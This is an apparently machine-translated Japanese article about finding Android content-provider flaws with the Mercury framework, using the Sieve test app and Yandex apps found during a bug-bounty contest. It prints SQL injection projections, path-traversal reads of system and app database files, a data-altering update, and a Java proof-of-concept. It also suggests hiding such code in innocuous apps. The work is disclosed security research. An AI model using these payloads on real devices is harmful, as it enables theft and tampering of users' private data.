🐤 🖍️ 🗳️ マーキュリー-Androidバグのメッセンジャー 👐🏻 👴 👌🏻

皆さん、こんにちは。今日は、私たちや他の人のAndroidアプリケーションで脆弱性を見つける方法と方法を見ていきます。また、これらの脆弱性のおかげで攻撃者ができることもわかります。さらに、Yandexのコンテスト「 Hunting for bugs 」のフレームワークで見つかった脆弱性の例を示します。

テスト対象のインストール

モバイルデバイスのプログラミングについては、ハードウェアとエミュレーターを使用して調査できます。実際のデバイスに特別な問題がない場合、Google Playからエミュレータにapkアプリケーションをインストールすると問題が発生します。 Yandexからプログラムを取得する最も簡単な方法はこれです。

apkファイルを取得するためのオプションを分析します（一部は既にHabrのページにありましたが、繰り返します）。

アプリケーションを実際のデバイスにダウンロードし、adbを使用してコンピューターに転送します。

デバイスの可用性を確認します。

adb devices

すべてのインストール済みアプリケーションは、「インストーラー」を/ data / appフォルダーに保存します。

 adb pull /data/app/ru.yandex.yandexmaps-1.apk C:\

Android OSはインストールされた各プログラムの番号付けを使用するため、最後に「-1」または「-2」のいずれかを指定できます。または、将来の分析のために、/ data / appセクションからインストールされているすべてのアプリケーションをダウンロードできます。

 adb pull /data/app path_to_comp

LG電話からすべてのプログラムをコピーする

非公式のAPIでスクリプトを使用します。

私はpythonで書かれたオプションを使用しています。これはgithubに投稿されており、javaに類似しています。その操作には、ユーザー名または他のGoogleアカウントに接続されている実際のデバイスのAndroidIDと、ユーザー名とパスワードまたはAuthTokenが必要です。

AndroidIDは、USSDコマンドを入力して見つけることができます。
```
 *#*#8255#*#*
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     
```
ここで、援助パラメータはAndroidIDです。これらはすべてconfig.pyファイルに入力されます。さらに、たとえば、次のコマンドを使用して、市場にあるすべてのYandexプログラムを検索できます。
```
 search.py yandex
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     
```
実行結果
Googleがエミュレータでプレイするシャーマニックな方法でインストールします。
たとえば、サイトからダウンロードします。

W3bsit3 - dns.com- 「クラックされた」プログラムを含む、すべての人気のあるプログラムがありますが、これらはもちろん参照用です。

xda-developers-ほとんどが「無料」またはオープンソースプログラム用のAPKです。

この場合、アプリケーションはブラウザを介してデバイスに直接インストールできます。

エミュレーターにアプリケーションをインストールする方法は2つあります。

EclipseのDDMS経由で、アプリケーションのインストールボタンを使用します。

adbコマンド経由：

 adb install app.apk

脆弱性分析ツールキット

「手動」分析に加えて、可能な限り「引用符」を挿入します; Androidアプリケーションの脆弱性を検索するためのプログラムは多くありません。最も人気のあるものは次のとおりです。

スカンドロイド
水銀

ScanDroidは、アプリケーションからdexクラスをJavaコードに逆コンパイルし、特定のルールに従ってユーザーが潜在的に危険な場所を示すように検索するルビースクリプトです。プログラムまたは翻訳の作成者からのドキュメントで詳細を見つけることができます。プログラムのソースコードも表示されます。

Mercuryは、Pythonで書かれたオープンソースフレームワークです。これは、Androidデバイスにインストールされ実行されているすべてのアプリケーションと対話できる対話型ツールのセットです。そして、彼と一緒に知り合いを続けます。

水星で働く

2.2.0バージョンは現在入手可能で、バージョン1+と比較して完全に再設計されています。ただし、どちらもダウンロード可能です。最初のバージョンの場合、インストールは簡単で、追加の依存関係は不要です。

メインサイトまたはgithubリポジトリから目的のバージョンをダウンロードできます。プログラム自体は2つの部分で構成されています。

クライアントは、コンピューター上で実行するpythonプログラムです（* nixとwindowsの両方で正常に動作します）。
エージェント（1+バージョンでは、この部分はサーバーと呼ばれていました）は、上記の方法のいずれかを使用してインストールできるapkアプリケーションです。

クライアント側のインストール

Linux（Debianライク）

依存関係のインストール：

  $ apt-get install build-essential python-dev python-setuptools $ easy_install --allow-hosts pypi.python.org protobuf==2.4.1 $ easy_install twisted==10.2.0

水銀のインストール：

  $ easy_install ./mercury-2.2.0-py2.7.egg

窓

依存関係のインストール：

開始するには、次のプログラムをダウンロードします。
- Python： www.python.org/download
- setuptools： pypi.python.org/pypi/setuptools/0.6c11

次に、次のパラメーターを使用してそれらを実行します。

  C:\Python27\Scripts\easy_install.exe --allow-hosts pypi.python.org protobuf==2.4.1 C:\Python27\Scripts\easy_install.exe pyopenssl C:\Python27\Scripts\easy_install.exe pyreadline C:\Python27\Scripts\easy_install.exe twisted==10.2.0

Windowsインストーラーを起動します。

Mac OS X

公式ガイドはありませんが、Xcodeはeasy_installが利用可能なコマンドラインツールでインストールできるため、コマンドを使用してインストールしようとすると

  $ easy_install ./mercury-2.2.0-py2.7.egg

すべてが正常にインストールされて終了しました。

設置例

サーバーのインストール

上記の方法のいずれかによってインストールされます。

adb install.apk
DDMS経由。
サイトから直接ダウンロードしてインストールします。

カスタマイズ

クライアントとサーバーを接続するには、デバイスのIPアドレスが必要です。エミュレーターの場合は、次のコマンドでポート転送を行う必要があります。

 adb forward tcp:31415 tcp:31415

したがって、スキャナーのIPアドレスは127.0.0.1になります。

実際のデバイスでは、WiFiネットワークのリストで目的のデバイスをクリックするだけで、品質、セキュリティのタイプ、必要なIPアドレスに関する詳細情報を含むポップアップウィンドウが表示されます。

コンピューターから起動する前に、デバイスでアプリケーションを実行する必要があります。埋め込みサーバーをクリックして、スイッチを「有効」の位置に切り替えます。 2番目のバージョンからは、sslを介してトラフィックを暗号化し、パスワードを設定することが許可されています。

エミュレーターでエージェントを開始する例

脆弱性を探す

デバイスに参加します。

Windows：

 C:\Python27\Scripts\>python mercury console connect IP

水銀コンソールの実行

Unix：

  mercury console connect IP

インストールされているすべてのモジュールのリストは、次のコマンドによって呼び出されます。

 list

リストコマンド出力

この記事では、すべてではなく、実際の例で脆弱性を見つけることができるもののみを検討します。

最初の実験プログラムは、開発者が提案するSieveです。

まず、プログラム（パッケージ）の名前を見つける必要があります。これを行う方法にはいくつかのオプションがあります。

コマンドを実行します：

 mercury> run app.package.list

そしてリストであなたのものを見つけてください。または、たとえばこの場合、フィルターを追加できます。

 mercury> run app.package.list –f sieve

任意のファイルマネージャーから/ data / dataフォルダー自体を表示します。
その他...

結果として、 com.mwr.example.sieveという名前を取得します

今日の記事では、多くの人がAndroid OSで見ることを期待していなかったが、Webに関連している脆弱性を検討します。

SQLインジェクション。
任意のファイルを読み取ります（LFI）。

さあ、続けましょう。アプリケーションに関する情報を取得します。

 mercury> run app.package.attacksurface com.mwr.example.sieve Attack Surface: 3 activities exported 0 broadcast receivers exported 2 content providers exported 2 services exported is debuggable

アクティビティ -Androidアプリケーションの表現スキームです。たとえば、プログラムを開いたときにユーザーに表示されるメイン画面。または、バグレポートを開発者に送信するためのフォーム。

サービス -ユーザーインターフェイスを提供せずにバックグラウンドタスクを実行します。

コンテンツプロバイダー -アプリケーションにデータを提供します。ほとんどの場合、sqliteアプリケーションデータベースに提供します。他のアプリケーションから呼び出すことができます。

ブロードキャストレシーバー （ブロードキャストレシーバー）-システムメッセージと暗黙的なインテントを受信し、システムステータスの変化に応答するために使用できます。

Habrのページで、特にAndroid開発チュートリアルで、 Androidアプリケーションの構造について詳しく読むことができます。それまでは、コンテンツプロバイダーに対応します。利用可能なリストを確認します。

 mercury> run app.provider.finduri com.mwr.example.sieve Scanning com.mwr.example.sieve... content://com.mwr.example.sieve.DBContentProvider/ content://com.mwr.example.sieve.FileBackupProvider/ content://com.mwr.example.sieve.DBContentProvider/Passwords content://com.mwr.example.sieve.DBContentProvider/Keys content://com.mwr.example.sieve.FileBackupProvider

Mercuryはapkファイルを展開し、正規表現を使用して、「content：//」とAndroidManifest.xmlファイルのProvidersブロックを含む行が存在するかどうかをスキャンします。私の練習では、開発者がさまざまな方法を使用して暗号化された文字列から自分自身を保護するために遭遇したため、アプリケーションを手動で元に戻す必要がありました。

コンテンツプロバイダーはほとんどの場合、アプリケーションのsqliteデータベースへのアクセスを提供するため、通常のsqlクエリを解析します。クエリの挿入、更新、削除に問題はないと思うので、selectのみに焦点を当てます。

パスワードは私を惹きつける最初のものではないと思うので、このプロバイダーから始めましょう。

 mercury> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords | _id | service | username | password | email | | 1 | habr | root | uVYNVnRWZxRM355wU3PqdCTpYc8= (Base64-encoded) | root@main.habr |

そして、クエリからすべての情報を取得します。次に、古き良きSQLインジェクションを試してみましょう。アンドロイドアプリケーションでsqliteが使用されていることを思い出してください。sqlite_master（データベース全体の構造）にリクエストを送信します。

 mercury> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --projection "* FROM sqlite_master--" | type | name | tbl_name | rootpage | sql | | table | android_metadata | android_metadata | 3 | CREATE TABLE android_metadata (locale TEXT) | | table | Passwords | Passwords | 4 | CREATE TABLE Passwords (_id INTEGER PRIMARY KEY,service TEXT,username TEXT,password BLOB,email) | | table | Key | Key | 5 | CREATE TABLE Key (Password TEXT PRIMARY KEY,pin TEXT ) | | index | sqlite_autoindex_Key_1 | Key | 6 | null |

ご覧のとおり、SQLインジェクションは成功し、データベース構造全体（テーブルとフィールド）が得られました。ところで、他のsqlite関数もここで機能します。たとえば、データベースのバージョン番号を見つけることができます。

 mercury> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --projection "sqlite_version();--" | sqlite_version() | | 3.7.4 |

このアプリケーションの残りの脆弱性は宿題のために残っていますが、今は記事の冒頭に戻り、Yandexのアプリケーションの発見について話すことを約束しました。水銀のおかげで、最初は独自のアプリケーション（PoC）を作成しなければならなかったため、操作のデモが簡素化されました。

PoCソースコードの要点

 //    2      -:         sql-   “* FROM sqlite_master--“ //     // uri – content provider // projectionArray –   , : “* FROM sqlite_master—“ public static ArrayList<String> getColumns (ContentResolver resolver, String uri, String[] projectionArray) { ArrayList<String> columns = new ArrayList<String>(); try { Cursor c = resolver.query(Uri.parse(uri), projectionArray, null, null, null); if (c != null) { String [] colNames = c.getColumnNames(); c.close(); for (int k = 0; k < colNames.length; k++) columns.add(colNames[k]); } } catch (Throwable t) {} return columns; } // « »,     -    // target – content-provider // projection –   public String make_shoot(String target, String projection) { ContentResolver r = getContentResolver(); String[] projectionArray = null; if (projection.length() > 0) { projectionArray = new String[1]; int i = 0; projectionArray[i] = projection; } String data = ""; Cursor c = r.query(Uri.parse(target), projectionArray, null, null, null); if (c != null) { ArrayList<String> cols = getColumns(r, target, projectionArray); Iterator<String> it = cols.iterator(); String columns = ""; while (it.hasNext()) columns += it.next() + " | "; data += columns.substring(0, columns.length() - 3); data += "\n\n"; for (c.moveToFirst(); !c.isAfterLast(); c.moveToNext()) { int numOfColumns = c.getColumnCount(); for (int l = 0; l < numOfColumns; l++) { try { data += c.getString(l); } catch (Exception e) { data += "(blob) " + Base64.encodeToString(c.getBlob(l), Base64.DEFAULT); } if (l != (numOfColumns - 1)) data += " | "; } } } return data; }

以下に、エラー情報を送信してから90日という制限のために見つかったいくつかの脆弱性のみを示します。

最初のアプリケーションを例として使用して、別のタイプの脆弱性を検討します。コンテンツプロバイダーを介したSQLインジェクションに加えて、多くのシステムファイルおよび脆弱なアプリケーションがアクセスするファイルに対して「オープンパス」攻撃を実行できます。 Yandex.Diskアプリケーションにこの種の脆弱性が見つかりました。すべてのユーザーが利用できるプロバイダーコンテンツは//ru.yandex.disk.cacheです。まず、システムファイルへのアクセスを確認します。

 mercury> run app.provider.read content://ru.yandex.disk.cache/../../../../../../../system/etc/hosts 127.0.0.1 localhost

次に、もっと面白いものにアクセスしてみてください。たとえば、アプリケーションデータベースに。アプリケーションがsqliteを使用し、そのフォルダー内の別のファイルにデータベースを保存することを思い出させてください。このファイルは、ルートと同じアプリケーションのみがアクセスできます。

 mercury> run app.provider.read content://ru.yandex.disk.cache/../../../../../../../../data/data/ru.yandex.disk/databases/disk

システム文字のため、カットの下でのコマンドの出力

ご覧のとおり、Yandex.diskに保存されているすべてのファイルのリストを取得します。さらに、アプリケーションはキャッシュを使用するため、ユーザーがモバイルアプリケーションを使用して開いたファイルを参照できますが、その後一時ファイルを含むフォルダーをクリアしませんでした。たとえば、ユーザーがYandex.Diskの操作に関するドキュメントを開いた場合：

 mercury> run app.provider.read content://ru.yandex.disk.cache/../../../../../../../sdcard/Android/data/ru.yandex.disk/files/disk/readme.pdf

攻撃するには、キャッシュディレクトリを知る必要がありますが、これは標準であり、以前のリクエストでファイル名をアプリケーションデータベースから取得できます。

PoCでは、プロバイダーへのこの呼び出しは、次の関数を通じて実装できます。

 resolver.openInputStream(uri)

ユーザーのブックマークを担当するコンテンツプロバイダーで別の脆弱性が見つかり、すべてのアプリケーションがそれらを変更できるようになりました。

 mercury> run app.provider.query content://ru.yandex.yandexmaps.labels.LabelsProvider/mylabels geocode | label_name_tolower | lon | date | label_name | _id | lat , ,  , 2/417 | Neuronspace.ru | 37.5732 | 1352196244367 | Neuronspace.ru | 1 | 55.7137 , ,  , 2/417 | Work | 37.5732 | 1352196427356 | Work | 2 | 55.7137 : update content://ru.yandex.yandexmaps.labels.LabelsProvider/mylabels --string label_name_tolower=Home label_name=Home --where _id=2 query content://ru.yandex.yandexmaps.labels.LabelsProvider/mylabels geocode | label_name_tolower | lon | date | label_name | _id | lat , ,  , 2/417 | Neuronspace.ru | 37.5732 | 1352196244367 | Neuronspace.ru | 1 | 55.7137 , ,  , 2/417 | Home | 37.5732 | 1352196427356 | Home | 2 | 55.7137

それで、仕事は家になりました。または、場所の座標を変更すると、ユーザーは間違った住所に到着します...

次に脆弱なプログラムはYandex.Electricsです。ここでは、データを操作する機能を備えたデータベースへのSQLインジェクションなどの脆弱性も発見されました。

 mercury> run app.provider.query content://ru.yandex.rasp/files --projection "* FROM sqlite_master--" type | name | tbl_name | rootpage | sql ..... table | android_metadata | android_metadata | 3 | CREATE TABLE android_metadata (locale TEXT) table | files | files | 4 | CREATE TABLE files (_id integer primary key autoincrement, etag text, last_modified text, name text, region text,last_updated long,UNIQUE (name)) index | sqlite_autoindex_files_1 | files | 5 | null table | sqlite_sequence | sqlite_sequence | 6 | CREATE TABLE sqlite_sequence(name,seq) table | recent_stations | recent_stations | 7 | CREATE TABLE recent_stations (_id integer primary key autoincrement, region text, is_meta int,station_id text, UNIQUE (station_id, region)) index | sqlite_autoindex_recent_stations_1 | recent_stations | 8 | null table | favourite_stations | favourite_stations | 9 | CREATE TABLE favourite_stations (_id integer primary key autoincrement, station1 text, station1_meta int,station1_title text, station2 text,station2_meta int,station2_title text, current_from text, data_state int, identifier text, mirror_presented int, UNIQUE (identifier)) index | sqlite_autoindex_favourite_stations_1 | favourite_stations | 10 | null

データ変更の例については、ファイルキャッシュへのパスを変更します。

 mercury> run app.provider.update content://ru.yandex.rasp/files --string name "/system/sdcard/hack.txt” --where _id=2 _id | etag | last_modified | name | region | last_updated ..... 2 | 9bcbdc0620af50eadead14cdee81a1ded08f0259 | null | /system/sdcard/hack.txt | 213 | 1352462705854 1 | 548f13c285590c4bc8df665613d2d80e7be4678a | null | /data/data/ru.yandex.rasp/cache/all_cities.cache | | 1352462705064

この脆弱性により、攻撃者はお気に入りのステーションと最近のステーションのリストを読み取り、変更する可能性があります。また、キャッシュへのパスを変更すると、その時点でユーザーがインターネットに接続していない場合、アプリケーションを「ドロップ」したり、スケジュールを変更したりできます。

最後に、今日の脆弱なプログラム-Yandex.Taxi。今回はリストとそれらを使って何ができるかだけを示します。いくつかのコンテンツプロバイダーが脆弱であることが判明しました。

最初： 内容：//ru.yandex.taxi/taxi

ユーザーが利用できるタクシーのリストを受け取り、変更できます。通話はライブオペレーターを経由するため、ユーザーに車を投げることができたかどうかはわかりませんが、ユーザーに最も近いタクシーから番号やその他の情報を取得できます。残りはそれほど面白くない：

内容：//ru.yandex.taxi/history-名前が示すように、検索と呼び出しの両方の履歴へのアクセスを許可しました。
内容：//ru.yandex.taxi/delay_order-注文履歴へのアクセス。

この種の情報はすべての攻撃者に必要というわけではありませんが、一部の「je」または「私立」探偵は興味深いでしょう。

しかし、このような脆弱性の主な違いは、上記のすべてを実行する悪意のあるアプリケーションが追加の権限を必要としないことです。攻撃者はユーザーに新しい壁紙を配置することを提案できます。ほとんどの人は、アプリケーションのインストールに奇妙な権限が必要な場合、たとえば、アプリケーションがSMSを送信し、ビデオを見るためにsdカードをマウントする権利を必要とすることを知っているため、最初にこれを見てみましょう。しかし、彼は奇妙なものを見ることはなく、設置による問題はないと思います。または、このような機能を別のアプリケーション、たとえば怒っている鳥に埋め込みます...

水星の他の機能

また、デバイスにインストールされているすべてのプログラムを通過し、選択した種類の脆弱性を自動的に悪用しようとするスキャナーも含まれています。以前のタイプの脆弱性のスキャナー：

scanner.provider.injection-SQLインジェクションの可能性をテストします
scanner.provider.traversal-使用可能なファイルを読み取る機能のテスト

パス開示脆弱性スキャナーの例

最初に、テストするコンテンツプロバイダーのリストが表示され、最後に、上記のコマンドおよび/または反転によって結果がチェックされます。

一部のスキャナーでは、デバイスにbusyboxをインストールする必要があります。

 mercury> run scanner.misc.readablefiles This command requires BusyBox to complete. Run tools.setup.busybox and then retry. mercury> run tools.setup.busybox BusyBox installed. mercury>

おわりに

この記事では、Androidアプリケーションの脆弱性を検索するための汎用ツールである水銀に出会いました。 Androidアプリケーションの一部であるコンテンツプロバイダーの操作方法を詳細に検討しました。アクティビティ、サービス、およびブロードキャストレシーバーは点灯しません。将来、発見された脆弱性の例により、このタイプの脆弱性に水銀を使用する方法を見つけて示すことが計画されています。また、分析のために他のプログラムをより詳しく知ることも計画されています。

迅速な対応をしてくれたYandexセキュリティ部門の専門家に感謝します！そして、アプリケーション開発者-遅いが本当だ;）見つかった識別の修正。

マーキュリー-Androidバグのメッセンジャー